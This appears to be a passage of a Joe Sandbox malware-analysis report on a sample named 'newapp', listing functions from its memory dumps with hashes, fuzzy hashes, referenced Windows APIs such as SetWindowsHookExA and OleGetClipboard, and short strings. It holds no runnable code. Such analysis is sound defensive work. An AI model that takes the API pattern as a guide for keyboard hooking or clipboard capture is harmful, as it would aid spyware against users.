API String ID: 0-3823777903
Opcode ID: 632abe6ecb7becc5c946e6534a9ae40cc8f0bcb938a074b243766360f7d2498c
Instruction ID: 92cee9489e372aba195d296e73ac7a95c6b91d898719dc9eb2998aec23711d77
Opcode Fuzzy Hash: 632abe6ecb7becc5c946e6534a9ae40cc8f0bcb938a074b243766360f7d2498c
Instruction Fuzzy Hash: AAE17B31E1020A8FCB55DF69D9846AEB7B6AF85304F20C939E409EB758DB31DC46CB91

Function 069CA299 Relevance: 6.1, APIs: 4, Instructions: 138
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 069CA326
GetCurrentThread.KERNEL32 ref: 069CA363
GetCurrentProcess.KERNEL32 ref: 069CA3A0
GetCurrentThreadId.KERNEL32 ref: 069CA3F9

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 803de0d35652acadbd47b6209bc04760c4ac08965224445c92414e83fead20ff
Instruction ID: 9953badcf693d587ada379652112ea863b8250df1cb9c54da874d53749928778
Opcode Fuzzy Hash: 803de0d35652acadbd47b6209bc04760c4ac08965224445c92414e83fead20ff
Instruction Fuzzy Hash: 695179B09003099FDB44CFAAD948BDEBBF5EF48314F208459E00AA7760D7349984CF66

Function 069CA2A8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 069CA326
GetCurrentThread.KERNEL32 ref: 069CA363
GetCurrentProcess.KERNEL32 ref: 069CA3A0
GetCurrentThreadId.KERNEL32 ref: 069CA3F9

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b8ffa53fe131f67d2ae8962fbc9ec925c8e76a1eebf1387448f098c32c2da469
Instruction ID: 4e288eb091ed35f48f088b703da757b9b5a8d555cdaf7cfbf34c70e5a2c1c06a
Opcode Fuzzy Hash: b8ffa53fe131f67d2ae8962fbc9ec925c8e76a1eebf1387448f098c32c2da469
Instruction Fuzzy Hash: 175135B09003098FDB54DFAAD948BDEBBF5EF48314F208459E41AA7760DB349984CF65

Function 069CA247 Relevance: 6.1, APIs: 4, Instructions: 125
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 069CA326
GetCurrentThread.KERNEL32 ref: 069CA363
GetCurrentProcess.KERNEL32 ref: 069CA3A0
GetCurrentThreadId.KERNEL32 ref: 069CA3F9

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4f577b4633220932f1d9d60fa70ba0eaac1d4a66f420b827cf38e4511851237e
Instruction ID: 145799900968f0c12f178c96c47dcce08793ca2b8e624cadeee333d46e617367
Opcode Fuzzy Hash: 4f577b4633220932f1d9d60fa70ba0eaac1d4a66f420b827cf38e4511851237e
Instruction Fuzzy Hash: 645154B09003098FDB44CFAADA48BDEBBF1AF48314F20C459D01AA7760DB349985CF66

Function 069D9238 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 069D92C6
$^q, xrefs: 069D92BA
$^q, xrefs: 069D927F
$^q, xrefs: 069D928B

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 756c7a86e87f71d4cbe01a803d3bbbb22c1e6191472dcb3813e90ddd3770f8a2
Instruction ID: d86f0b4a8ef17e8561fe1e96bbc213b6dfd7b96cda990dfd9899707f55534652
Opcode Fuzzy Hash: 756c7a86e87f71d4cbe01a803d3bbbb22c1e6191472dcb3813e90ddd3770f8a2
Instruction Fuzzy Hash: 1A913E30B0021A9FDB54EF65D9907AFB7F6AF88204F10C569D80DEB784EA709D46CB91

Function 069DD038 Relevance: 4.5, Strings: 3, Instructions: 799
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 069DD437
$^q, xrefs: 069DD443
$^q, xrefs: 069DD42F

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: b3ed24fb4f9f680905325312469888a58f651a9f8e1ef7550d5f8ecb1aad629b
Instruction ID: 86f3138215f863ca3d217d518a62da1f09fde3229e097fa78ca42b6743ad9d49
Opcode Fuzzy Hash: b3ed24fb4f9f680905325312469888a58f651a9f8e1ef7550d5f8ecb1aad629b
Instruction Fuzzy Hash: 39622E30A002169FCB55EF68D580A5DB7B2FF84344B24CA69D409DF769DB71ED4ACB80

Function 069D4C78 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPcq, xrefs: 069D4DC9
fcq, xrefs: 069D4CA3
\Ocq, xrefs: 069D4E53

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: fa72c5b2549aaf99e00f8f66ac62c947c9a13d143d3a6b18b5f2cc54f0d968c5
Instruction ID: 41ea2cead6efcbbca99e6b7d82903f5776ae7489f53468750e34dd83b8f2595c
Opcode Fuzzy Hash: fa72c5b2549aaf99e00f8f66ac62c947c9a13d143d3a6b18b5f2cc54f0d968c5
Instruction Fuzzy Hash: 57615F30F002189FEB549FA5C8547AEBBF6EF88700F208429E109EB395DF758D459B91

Function 069D9228 Relevance: 2.7, Strings: 2, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 069D92BA
$^q, xrefs: 069D927F

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 8222e90aff2fb97fe56eb962c5b3759feaf5d0725c70266ddf24098fde0844df
Instruction ID: e24f545ed352e0c43ca0379204ffce7430d3cbebec7c8a6f81f04a7c8d8d206b
Opcode Fuzzy Hash: 8222e90aff2fb97fe56eb962c5b3759feaf5d0725c70266ddf24098fde0844df
Instruction Fuzzy Hash: 50513F30B011159FDB94EBA4D9A0B6FB3FAAB88654F108539D51DDB788DA30DC43CB91

Function 069D4C69 Relevance: 2.6, Strings: 2, Instructions: 138COMMON

Download Yara Rule

Strings

XPcq, xrefs: 069D4DC9
fcq, xrefs: 069D4CA3

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: fcq$XPcq
API String ID: 0-936005338
Opcode ID: 47f1201072d32e3f6d321f0f1c65f8cc944173f2412f25679b439d34e6fc797e
Instruction ID: c9af7144465e7dfe0228edbde88fdde931e7ba01d09a115641dafe6baf5f8446
Opcode Fuzzy Hash: 47f1201072d32e3f6d321f0f1c65f8cc944173f2412f25679b439d34e6fc797e
Instruction Fuzzy Hash: 0D516A30F102089FDB55DFA5C854BAEBBF6AF88700F20C52AE109EB395DA758D059B91

Function 069C5370 Relevance: 1.8, APIs: 1, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e4ace13408c19fc2a8860f6c1489bb3e1b8be90df8ca0b75905e29a434e6872b
Instruction ID: f1b021386c4b2fe8f17f2ce3173b88f79c489dfb13da84f8fec9a98c80833bc0
Opcode Fuzzy Hash: e4ace13408c19fc2a8860f6c1489bb3e1b8be90df8ca0b75905e29a434e6872b
Instruction Fuzzy Hash: 2CB16B70B007058FCB44EF69C89065EBBF6EF88320B10892DD41ACBB55DB74E856CB91

Function 02A6EEA8 Relevance: 1.6, APIs: 1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4167175807.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2a60000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c79c10442a1ba79e9c823b2030c58a68474d86e811ca0ca019ffbd2ca62288
Instruction ID: e25a4236bcfde0791b93a97a710db7dbb28ff0db5bde86b0c7c4ec0563ef4b10
Opcode Fuzzy Hash: 93c79c10442a1ba79e9c823b2030c58a68474d86e811ca0ca019ffbd2ca62288
Instruction Fuzzy Hash: 3741F271E043999FCB14CF69D844AAEBFF5AF89310F1485ABE448A7251DB389841CBE1

Function 069C674F Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 069C686A

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4cd02390d7906650c94a63cf76a90017cf211af59dc0b4129ad04a5dbdaf37e5
Instruction ID: 8d5d8e83239d659241cac4e52506ef3a79ca1093e1ec7e705fbe343f71f8170a
Opcode Fuzzy Hash: 4cd02390d7906650c94a63cf76a90017cf211af59dc0b4129ad04a5dbdaf37e5
Instruction Fuzzy Hash: 9F51CFB1D003499FDB14CFA9C884ADEFFB5BF88310F24852AE419AB210D770A985CF91

Function 069C6758 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 069C686A

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 12be059f2b14b7ba990896b5864327b282f696f8b4d324bd64c18be3a5534911
Instruction ID: da92f6fc979e22afdbb6ee5dffedded27a75f13b421dafe2df6d8af04d171121
Opcode Fuzzy Hash: 12be059f2b14b7ba990896b5864327b282f696f8b4d324bd64c18be3a5534911
Instruction Fuzzy Hash: C941BEB1D003499FDB14CF9AC884ADEBBB5FF48310F24852AE819AB210D775A985CF91

Function 069CA274 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 069CB851

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 77e8eb8377d5863fcf8cfa804edf3e48e53765f16970ffeec3fb785918510a52
Instruction ID: 34d54803ec8d41cbcf290b630e792fa2acfe4a0c798e25268cf2031dce42c93f
Opcode Fuzzy Hash: 77e8eb8377d5863fcf8cfa804edf3e48e53765f16970ffeec3fb785918510a52
Instruction Fuzzy Hash: 304117B4E00309CFDB54CF99C489AAABBF5FB88324F24C459D519AB725D734A841CFA1

Function 069CC0D4 Relevance: 1.6, APIs: 1, Instructions: 77comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 069CC168

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 8a872618d03fe58f3793d1eddf8dd06ff931fb6bd54320ccbd2ae0a2a7ffba0e
Instruction ID: 78fb7974a217cefeffb6ba104834d2dad825cb69e9bd40bd34098ccbbfd7c024
Opcode Fuzzy Hash: 8a872618d03fe58f3793d1eddf8dd06ff931fb6bd54320ccbd2ae0a2a7ffba0e
Instruction Fuzzy Hash: 8F3102B0E01248EFDB14CFA9C984BDEBFF5AF48314F248019E409BB290DB755985CBA5

Function 069CC0E0 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 069CC168

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 0972b9fea534877604348ecc4bd1b1cde863ebf6355532beb230a0ea2456e06b
Instruction ID: 5dfa4755c6f188af2c721434bce9e40a22bedcde611b0fd5416d0f86cbb666f2
Opcode Fuzzy Hash: 0972b9fea534877604348ecc4bd1b1cde863ebf6355532beb230a0ea2456e06b
Instruction Fuzzy Hash: 2731E0B0E01248DFDB14DF99C984B8EBFF5AB48314F248019E409AB290DB756985CB95

Function 069CA4E8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 069CA577

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6ab5ea0eb5f9162974bfbaf736ef33291543a708b38f153e434ae92065e0a59a
Instruction ID: 08a97987fae684b6ea9617cf3bccca1541b0c23512e42640a9628d2d3ef86fbe
Opcode Fuzzy Hash: 6ab5ea0eb5f9162974bfbaf736ef33291543a708b38f153e434ae92065e0a59a
Instruction Fuzzy Hash: 2E21E7B5D01259DFDB10CFA9D984ADEFFF8EB48320F14841AE955A3210C374A944CFA5

Function 069CA4F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 069CA577

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e0fe1a04bdb2e4ddac5f810127eef9216fd8b8a41594f71da4377734ec4ae4cd
Instruction ID: 449a0f2ed47e1f905d80c894a5ee68a54d7d900a66e53fbd45619addbaddef1b
Opcode Fuzzy Hash: e0fe1a04bdb2e4ddac5f810127eef9216fd8b8a41594f71da4377734ec4ae4cd
Instruction Fuzzy Hash: 7921E3B59002489FDB10CF9AD984ADEFBF8EB48320F14801AE958A3210C374A944CFA5

Function 069CDEA0 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 069CDF23

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: ffde027ebdc1962105254ad0083a13f2eb49ccf92ca57a39be1b0acaa84ad1de
Instruction ID: 26955bac0091da3db954ee05df52080f768edffcf3b18e5d51cc2806eb6616f6
Opcode Fuzzy Hash: ffde027ebdc1962105254ad0083a13f2eb49ccf92ca57a39be1b0acaa84ad1de
Instruction Fuzzy Hash: CA2102B19002499FDB54CF9AC844BEEFBF5EF88324F10842AE459A7250C774A945CFA5

Function 02A6EF78 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 02A6EFE7

Memory Dump Source

Source File: 0000000F.00000002.4167175807.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2a60000_newapp.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 5a91ca7c4152bafe75c6e78c045387424cd2eb2f5297e69a4cf8f0e998f4960e
Instruction ID: 8a83db22f3664de49a3509406302481cf50debd97be997d6366f83db440488a1
Opcode Fuzzy Hash: 5a91ca7c4152bafe75c6e78c045387424cd2eb2f5297e69a4cf8f0e998f4960e
Instruction Fuzzy Hash: 341133B1C0066A9FCB10DF9AC548BDEFBF4EB48324F10816AE418A7240D778A940CFE5

Function 069CDEA8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 069CDF23

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: eb3dea4fc46f44ffeaae6723e59d89bcdf2f41837bff3a9b784e565d84b8b3b5
Instruction ID: f44ecab54724d46c6fb852b08c17507ec87970dd6c8c32863b2cb96304e6d165
Opcode Fuzzy Hash: eb3dea4fc46f44ffeaae6723e59d89bcdf2f41837bff3a9b784e565d84b8b3b5
Instruction Fuzzy Hash: 6A2113B1D002498FCB14CF9AC844BEEFBF5BF88320F10842AE459A7250C774A944CFA5

Function 069C56A8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 069C5716

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 85efc6a2fdcb1480edc0e6c7bf652c6dadbfcf6eaea5dc1b69a8eff88c89d65f
Instruction ID: 46bec151b9a60b0afb9334e9f0da1c0292e6fb80758a72580802f2859471e824
Opcode Fuzzy Hash: 85efc6a2fdcb1480edc0e6c7bf652c6dadbfcf6eaea5dc1b69a8eff88c89d65f
Instruction Fuzzy Hash: FD1126B5C01649DECB10CF9AC844BDEFBF8EB49320F11852AD459A7610C375A586CFA5

Function 069C3FFC Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 069C5716

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 754df56c66fcd90ac73c2a342ea4634bae8629554ed46c4b900e74a5fca07d1f
Instruction ID: c6ad12c507c033ad2bc42679fc16ad0eb5e4bb29725a498befc28c4501fcf023
Opcode Fuzzy Hash: 754df56c66fcd90ac73c2a342ea4634bae8629554ed46c4b900e74a5fca07d1f
Instruction Fuzzy Hash: C91120B5C00749CFCB10CF9AC448ADEFBF8EB88220F10846AD869B7610C374A585CFA5

Function 069CBF91 Relevance: 1.5, APIs: 1, Instructions: 49comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 069CBFED

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 44122fff161a73177d7e805ccf166c6ef3af05a00cb25fee5faee0ba86e10084
Instruction ID: 45538d01f92b1a84485c1382b6996aef2c30d065c9d8ab801ff7752f14aab011
Opcode Fuzzy Hash: 44122fff161a73177d7e805ccf166c6ef3af05a00cb25fee5faee0ba86e10084
Instruction Fuzzy Hash: 6C1125B58002498FDB20DF9AD949BDEFFF8EB48220F10845AE458A7610C375A584CFA5

Function 069CBAC8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,069CBAA5), ref: 069CBB2F

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 73cdf50909e5c6ce4444af7ebfdd568655deea85761fab79d2c37ce7b7f8e45d
Instruction ID: efb499cf1ec8c9864bdb69fe9895879e85c8ee3c28f447f42a0d28350aae32cd
Opcode Fuzzy Hash: 73cdf50909e5c6ce4444af7ebfdd568655deea85761fab79d2c37ce7b7f8e45d
Instruction Fuzzy Hash: 1E1103B58002498FCB10DF9AD985BDEFBF8EB48324F20841AD559A7650C778A984CFA5

Function 069CB4EC Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 069CBFED

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 09694f47249d0c73f0619156bf81c91dbdad63fc11ba7c432366167354c75018
Instruction ID: 3c2c8f0c234735f9c493d68fd79df21126c9916ab12b5f84660c1ba718fc5e55
Opcode Fuzzy Hash: 09694f47249d0c73f0619156bf81c91dbdad63fc11ba7c432366167354c75018
Instruction Fuzzy Hash: B41100B59003488FDB20DF9AD449B9EFBF8EB48324F20845AE559A7710D378A944CFA5

Function 069CB2B4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,069CBAA5), ref: 069CBB2F

Memory Dump Source

Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: cdf6bec89e7f28540cb50c78b1456be7f481faa735e1c5c1d0770c6e4976b3b4
Instruction ID: 808d9b66ae6c44ccc0d06913f23802c6b9bec18ba3d0bbef7c898e7a18cb41c3
Opcode Fuzzy Hash: cdf6bec89e7f28540cb50c78b1456be7f481faa735e1c5c1d0770c6e4976b3b4
Instruction Fuzzy Hash: C51130B1800348CFCB60DF9AC489BDEFBF8EB48324F20842AD559A7610C374A944CFA5

Function 069DDBAD Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

PH^q, xrefs: 069DDD09

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 9d622f0170ba524deb70c993f1eeebcbd4f79a30cdb9ab63b1f8827287ee35d7
Instruction ID: 85672a863d4b68604bad01c93f3556331cd759530eed4369b43fb74d047d0e26
Opcode Fuzzy Hash: 9d622f0170ba524deb70c993f1eeebcbd4f79a30cdb9ab63b1f8827287ee35d7
Instruction Fuzzy Hash: 6B41B130E002199FDF51DF75C9446AEBBB6EF85300F24893AE406EB640DB70E94ACB91

Function 069DDBC0 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

PH^q, xrefs: 069DDD09

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 7f20769a9643dec9bd6cc679aa85e6682c9f76f59674f2bbdf954c6a346d4ff6
Instruction ID: f6b374b35c9f956b34e43ddfcfb605a1d4bf29ee4f36eaa71b17345d831dfbbc
Opcode Fuzzy Hash: 7f20769a9643dec9bd6cc679aa85e6682c9f76f59674f2bbdf954c6a346d4ff6
Instruction Fuzzy Hash: 6A416030E002099FDF55DFB5C9546AEBBB6EF85300F208939D406E7640DB75E949CB91

Function 069D21C5 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

PH^q, xrefs: 069D2313

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: b99d621b16118505da26609be867f7ae558beb56363bd4c571dee2ae29c5cfff
Instruction ID: b0f8feb4e230b6beb0e2ed27e82bcfef10c846d75efe8446802c6be5d97190d7
Opcode Fuzzy Hash: b99d621b16118505da26609be867f7ae558beb56363bd4c571dee2ae29c5cfff
Instruction Fuzzy Hash: A4310431B002058FDB4A9B74C91476FBBE2AF89204F248538E506EB395DF35DE46CBA1

Function 069D21D8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PH^q, xrefs: 069D2313

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 42bf04dfb5e3a4fcd41210a577361c09ed8394d9d318fea451dd14f61e0f5291
Instruction ID: 7c421b8f9332dbbf4b6f7e5642642af2906a094cb862fb86611a8bd04941590d
Opcode Fuzzy Hash: 42bf04dfb5e3a4fcd41210a577361c09ed8394d9d318fea451dd14f61e0f5291
Instruction Fuzzy Hash: 7B31F031B002058FDB49AB74D81476FBAE6AF89204F208438E506DB395DE35DE46CBA1

Function 069D4B61 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

\Ocq, xrefs: 069D4B6D

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: \Ocq
API String ID: 0-2995510325
Opcode ID: b89292dc79744077ec2bd73c3b8c93b196d71d851b845922795773f3210d39e5
Instruction ID: c1ab551e1d08e70bf916a01879f0af4e82d9c1a7ea155d2cf77be88e5eae75fe
Opcode Fuzzy Hash: b89292dc79744077ec2bd73c3b8c93b196d71d851b845922795773f3210d39e5
Instruction Fuzzy Hash: BFF0DA30A50119DBDB14DF94E899BAEBBB2BF88701F208129E402A7694CB741D05DB80

Function 069DB307 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

